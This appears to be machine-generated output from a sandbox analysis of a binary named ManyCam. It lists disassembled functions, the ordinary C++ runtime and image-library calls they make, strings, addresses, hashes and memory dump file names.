Opcode Fuzzy Hash: 21906fa773c1a88a46cbeca3caa33a554fe8bf6e2e2ae55b577b5ad68c6107b2
Instruction Fuzzy Hash: 5EF0AFB1904248EBCB14DF90ED41FDDBB78FB04720F40022AF812A32C0DB756A08CB54

Function 0048F5A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,005310F9,000000FF,?,0048C0E3,?), ref: 0048F5CD
std::bad_exception::bad_exception.LIBCMTD ref: 0048F5E1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048F5EF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,005310F9,000000FF,?,0048C0E3,?), ref: 0048F5FE

Strings

vector<T> too long, xrefs: 0048F5C5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 2e5544c3049f0ddd4019a116dffb44736a158589b34b35f21578acc8ae9f3b44
Instruction ID: 08e9fbeb3975674469a3edd29ebdb77383574d31636ade62e638ab3924d92cf8
Opcode Fuzzy Hash: 2e5544c3049f0ddd4019a116dffb44736a158589b34b35f21578acc8ae9f3b44
Instruction Fuzzy Hash: 3DF0AFB1944648EBCB14DFA4ED45FDDBB78FB04720F40022AF812A32C0DB756A08CB54

Function 005158F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00539FF9,000000FF,?,00515013,00000000), ref: 0051591D
std::bad_exception::bad_exception.LIBCMTD ref: 00515931
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0051593F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00539FF9,000000FF,?,00515013,00000000), ref: 0051594E

Strings

vector<T> too long, xrefs: 00515915

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: c03e804887ee8c35b5c9129f015bd810eaabdc85a554e80187cf2ad872c0fd71
Instruction ID: 51a0fa11ac444c003223335a96b02d8df365eee37e9292b937eae9cfb1e93a6e
Opcode Fuzzy Hash: c03e804887ee8c35b5c9129f015bd810eaabdc85a554e80187cf2ad872c0fd71
Instruction Fuzzy Hash: ABF0A9B1944248EBCB14DFA4ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54

Function 004B5A70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00533789,000000FF,?,004B5203,?), ref: 004B5A9D
std::bad_exception::bad_exception.LIBCMTD ref: 004B5AB1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004B5ABF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00533789,000000FF,?,004B5203,?), ref: 004B5ACE

Strings

vector<T> too long, xrefs: 004B5A95

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 7d4be2965033fb03e547b7350437180e22248366361f058fced24ed85baafd60
Instruction ID: fc41df5464ddba924a0dc626ab5e99040adcc0584381bc92148727cb0a18adb2
Opcode Fuzzy Hash: 7d4be2965033fb03e547b7350437180e22248366361f058fced24ed85baafd60
Instruction Fuzzy Hash: C9F0AFB1904248EBCB14DF90ED41FDDBB78FB04720F40022AF812A32C0DB756A08CB54

Function 0048FA20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00531159,000000FF,?,0048C3E3,?), ref: 0048FA4D
std::bad_exception::bad_exception.LIBCMTD ref: 0048FA61
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048FA6F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531159,000000FF,?,0048C3E3,?), ref: 0048FA7E

Strings

vector<T> too long, xrefs: 0048FA45

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: e43f4da5e34bbdf5da09b38449cb6b4d10e80e7ee71886185af6db6e9ad99d86
Instruction ID: c8a4cafde9e9d18d89a6ec27ab975a93f5cc337054f01616f8720c420af3b1d3
Opcode Fuzzy Hash: e43f4da5e34bbdf5da09b38449cb6b4d10e80e7ee71886185af6db6e9ad99d86
Instruction Fuzzy Hash: 9BF087B1904648EBCB14DFA0ED41BDDBB78FB04720F40022AE822A32C0EB756A08CB54

Function 00411B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00528E99,000000FF,?,00410AF3,00000000), ref: 00411BAD
std::bad_exception::bad_exception.LIBCMTD ref: 00411BC1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 00411BCF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00528E99,000000FF,?,00410AF3,00000000), ref: 00411BDE

Strings

vector<T> too long, xrefs: 00411BA5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 91c4acec3fcf390d7650ee22321e3af3fea277019d6c7fd99ac7c15ae0389148
Instruction ID: ab577654a64f9acfc70fc64036853a5e06cda14a9969e1db11fea8e1d234e52f
Opcode Fuzzy Hash: 91c4acec3fcf390d7650ee22321e3af3fea277019d6c7fd99ac7c15ae0389148
Instruction Fuzzy Hash: 4EF08CB1904248EBCB14DF90ED41B9DBB78FB14720F40022AA822A32C0DB756A08CB54

Function 00413D60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,?,00000000,00529039,000000FF,?,0041396B,744843B1), ref: 00413D8D
std::bad_exception::bad_exception.LIBCMTD ref: 00413DA1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 00413DAF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,?,00000000,00529039,000000FF,?,0041396B), ref: 00413DBE

Strings

vector<T> too long, xrefs: 00413D85

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 448ea5f94cb60192865ba4fbef2add8389144e365060ecc549b7188aeb5b01d7
Instruction ID: 9c1b3f4287bc4e1579ca5606d1e83d7bd75289f32f9710707e675685a1b0ed81
Opcode Fuzzy Hash: 448ea5f94cb60192865ba4fbef2add8389144e365060ecc549b7188aeb5b01d7
Instruction Fuzzy Hash: 35F08CB1904248EBCB14DF90ED45B9DBB78FB04720F40022AA822A32C0DB756A08CB54

Function 0048FE80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,005311A9,000000FF,?,0048C6C3,?), ref: 0048FEAD
std::bad_exception::bad_exception.LIBCMTD ref: 0048FEC1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048FECF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,005311A9,000000FF,?,0048C6C3,?), ref: 0048FEDE

Strings

vector<T> too long, xrefs: 0048FEA5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 27461d1cee31f37f4b12f43d61b2addfb9a3f208f85983c24dba573d14a14082
Instruction ID: 5f6de052f28c2a1b459ecf3d81b30dea1840ef8b00bbd3f5c657bc7d8005cdfb
Opcode Fuzzy Hash: 27461d1cee31f37f4b12f43d61b2addfb9a3f208f85983c24dba573d14a14082
Instruction Fuzzy Hash: 0AF0A9B1904648EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54

Function 00B9EAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvReleaseImage,00C4124F,.\cxarray.cpp,00000D70), ref: 00B9EACE

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvReleaseData.GLU32 ref: 00B9EAE8
cvReleaseImageHeader.GLU32(?), ref: 00B9EAF2

Strings

.\cxarray.cpp, xrefs: 00B9EABD
cvReleaseImage, xrefs: 00B9EAC7

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Release$DataErrorHeaderImageStatus
String ID: .\cxarray.cpp$cvReleaseImage
API String ID: 926958628-2635489
Opcode ID: 7b56ca89f318cc8c3acea1c8ca0a27635176ae59afa919448a5e0028b3371b80
Instruction ID: 3ff126f1e4bbc0b3dd5a7d45d64b30f1c39227278fd24c59ec456ab600156d81
Opcode Fuzzy Hash: 7b56ca89f318cc8c3acea1c8ca0a27635176ae59afa919448a5e0028b3371b80
Instruction Fuzzy Hash: 0DE04FB47043016BDF54EB659C52F1A36D8BB91F45F9804BDB55DD21E1E670E4408621

Function 00BC68F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvClearGraph,00C4124F,.\cxdatastructs.cpp,00000B5C), ref: 00BC690F

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvClearSet.GLU32(?), ref: 00BC691D
cvClearSet.GLU32(?,?), ref: 00BC6923

Strings

cvClearGraph, xrefs: 00BC6908
.\cxdatastructs.cpp, xrefs: 00BC68FE

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Clear$ErrorStatus
String ID: .\cxdatastructs.cpp$cvClearGraph
API String ID: 3422590010-1773547513
Opcode ID: 26bb6a1391119f42ccad09c41395fa5ec1e67b849e1a88a37cbd8635631a2bd0
Instruction ID: 5eeb01400b13836b9d4b6f4e24ff8b6ec52ec9a4288f22b7690d0e041bc3e5fd
Opcode Fuzzy Hash: 26bb6a1391119f42ccad09c41395fa5ec1e67b849e1a88a37cbd8635631a2bd0
Instruction Fuzzy Hash: B5D05EA2A8573133892176297C43E8B37E82F51F24B0E05EEF954B7293D6A0B98041E1

Function 00C109A0 Relevance: 7.8, APIs: 5, Instructions: 345COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00C10C4F
_CIsqrt.MSVCR80 ref: 00C10C93
_CIsqrt.MSVCR80 ref: 00C10CD5
_CIsqrt.MSVCR80 ref: 00C10D13
_CIsqrt.MSVCR80 ref: 00C10D28

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Isqrt
String ID:
API String ID: 4112084577-0
Opcode ID: 35f7557e7b7c6f32a9ffa0962ed04bda3ea10d3bbe45a0b77a5f596eaabf9321
Instruction ID: 4367b61d0d57e50b5ad36d2f7767e025f44083951ff1a95c0c24b1dcfc07a5a2
Opcode Fuzzy Hash: 35f7557e7b7c6f32a9ffa0962ed04bda3ea10d3bbe45a0b77a5f596eaabf9321
Instruction Fuzzy Hash: 68C180F2E04705A7C316BE50D155289BBF0FB857E0F714D48E4DAA11BAFA3289B49EC1

Function 00C0A293 Relevance: 7.8, APIs: 5, Instructions: 263COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00C0A505
_CIsqrt.MSVCR80 ref: 00C0A54B
_CIsqrt.MSVCR80 ref: 00C0A58B
_CIsqrt.MSVCR80 ref: 00C0A5C7
_CIsqrt.MSVCR80 ref: 00C0A5DD

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Isqrt
String ID:
API String ID: 4112084577-0
Opcode ID: 357e31409b6b94d3510d5b9797a56754bda9540ad1fda6e91dd1ea9ad514b466
Instruction ID: dd9beab6ef63432d45ec3beed1470117f81bdf93efada29ac4fe5ead86eebf95
Opcode Fuzzy Hash: 357e31409b6b94d3510d5b9797a56754bda9540ad1fda6e91dd1ea9ad514b466
Instruction Fuzzy Hash: 66B12FB1E087419BC369DF5AC54029AFBE0FFC43A0F218D2EE4D592261E7798955CF82

Function 00C0E8B0 Relevance: 7.7, APIs: 5, Instructions: 212COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00C0E9D2
_CIsqrt.MSVCR80 ref: 00C0EA16
_CIsqrt.MSVCR80 ref: 00C0EA58
_CIsqrt.MSVCR80 ref: 00C0EA96
_CIsqrt.MSVCR80 ref: 00C0EAAB

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Isqrt
String ID:
API String ID: 4112084577-0
Opcode ID: 702055598ddced4a308cc8054766e6d8103471733802266e7b4559b6240cae3e
Instruction ID: 1b5f2d6a3a1414a52bb88d37fb90e08207d950a1d29ca723a5e914f468c952cc
Opcode Fuzzy Hash: 702055598ddced4a308cc8054766e6d8103471733802266e7b4559b6240cae3e
Instruction Fuzzy Hash: 1561D4B3F04601A2C7577E91C5512D9BBB4FB907E0B715D4CA4C6B12BAFB228A709EC1

Function 0050D790 Relevance: 7.7, APIs: 6, Instructions: 164COMMON

Download Yara Rule

APIs

wcscpy.MSVCR80 ref: 0050D83B
wcscat.MSVCR80 ref: 0050D850

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: wcscatwcscpy
String ID:
API String ID: 1670345547-0
Opcode ID: e2b6f5d47b797e7b3fc719e1e1982e1acc003f1d96efd1ad022790a38e43f0aa
Instruction ID: 3389ee2cf22810ea72753d2d0cc2d0bc4eb9618de903a8545642f9e6fbc98239
Opcode Fuzzy Hash: e2b6f5d47b797e7b3fc719e1e1982e1acc003f1d96efd1ad022790a38e43f0aa
Instruction Fuzzy Hash: BF714EB5A0010ADFCB14CF54D984AAEBBB5FF85310F148998E90AAB381D770EE44CF65

Function 00503DF0 Relevance: 7.7, APIs: 5, Instructions: 164COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP80(744843B1,?,?,?,744843B1,000000FF,?,00538C88,000000FF,?,0050260E,?,00000001,744843B1), ref: 00503E2C
?flags@ios_base@std@@QBEHXZ.MSVCP80(?,?,?,744843B1,000000FF,?,00538C88,000000FF,?,0050260E,?,00000001,744843B1), ref: 00503E81
?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP80(0050260E,?,?,?,744843B1,000000FF,?,00538C88,000000FF,?,0050260E,?,00000001,744843B1), ref: 00503E9F
??1locale@std@@QAE@XZ.MSVCP80(?,744843B1,000000FF,?,00538C88,000000FF,?,0050260E,?,00000001,744843B1), ref: 00503ECE
?good@ios_base@std@@QBE_NXZ.MSVCP80(?,?,?,744843B1,000000FF,?,00538C88,000000FF,?,0050260E,?,00000001,744843B1), ref: 00503FD0

Part of subcall function 00503AA0: ?fail@ios_base@std@@QBE_NXZ.MSVCP80 ref: 00503ABD

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ?good@ios_base@std@@$??1locale@std@@?fail@ios_base@std@@?flags@ios_base@std@@?getloc@ios_base@std@@Vlocale@2@
String ID:
API String ID: 1501252752-0
Opcode ID: ddfaf7a637f4d78839835dee01d19acffd7136be91526d35f5f5c0920258139d
Instruction ID: 6ba259f0433efdbda44c084f56a44e9fe0f1a453adb065355b40409e40917acf
Opcode Fuzzy Hash: ddfaf7a637f4d78839835dee01d19acffd7136be91526d35f5f5c0920258139d
Instruction Fuzzy Hash: 9961F874E002099FCB04DFA4D995AEEBBF5FF89300F248159E502A7392DB36AE05DB50

Function 00506EF0 Relevance: 7.6, APIs: 5, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00506F28

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

??2@YAPAXI@Z.MSVCR80(00000004,00565168,744843B1,?,?,?,?,?,?,?,?,?,?,00539108,000000FF), ref: 00506F2F
codecvt.LIBCPMTD ref: 00506F9F
wcstol.MSVCR80 ref: 00506FEE
codecvt.LIBCPMTD ref: 00507011

Part of subcall function 00415BF0: ??3@YAXPAX@Z.MSVCR80(?,?,?,00415B3D,00000000,?,00415660,?,00000000,?,00415162,?,?,004141EC,00000000,?), ref: 00415C0B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
